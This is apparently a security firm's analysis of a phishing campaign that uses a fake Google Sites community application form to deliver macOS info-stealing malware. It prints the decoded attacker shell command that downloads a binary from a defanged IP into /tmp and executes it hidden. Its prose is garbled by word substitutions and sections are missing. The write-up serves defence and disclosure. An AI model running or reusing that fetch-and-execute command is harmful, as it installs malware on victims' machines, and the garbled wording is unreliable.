Analysis of a Google Sites Community Application Phishing Campaign and macOS Information-Stealing…

Analysis of a Google Sites Community Application Phishing Campaign and macOS Information-Stealing Malware

MistEye Response

MistEye is a Web3 menace intelligence and dynamic safety monitoring system independently developed by SlowMist. It integrates safety monitoring and menace intelligence aggregation capabilities to supply customers with real-time threat alerts and asset safety.

MistEye promptly synchronized the danger via its menace intelligence feeds and buyer alert channels upon detection.

1. Background

The preliminary lead for this incident got here from intelligence shared by Bruce Xu (@brucexu_eth). The phishing hyperlink was disguised as an software portal for a Builder group. The web page emphasised phrases equivalent to “verified founders, builders, VCs, audio system and influencers” and “Only severe members, no scams” in an try and create the impression of a reliable group screening and anti-scam verification course of.

2. Stage One: Disguised Community Application Form

The attackers selected Google Sites because the internet hosting platform and embedded a type with a person interface resembling Google Forms. Titled “Apply”, the shape was designed to impersonate a BuilDAO software type.

The command used within the native information was wrapped in Base64 and then executed via base64 -d | bash. The decoded logic is as follows. To forestall unintended execution, the next URLs have been deactivated:

clear
echo "Loading… Please Wait"
curl -s hxxp://86[.]54[.]25[.]213/d/unix32385485 > /tmp/unix001
chmod +x /tmp/unix001
/tmp/unix001 > /dev/null 2>&1 & disown

9. Attack Chain Review

Similar Posts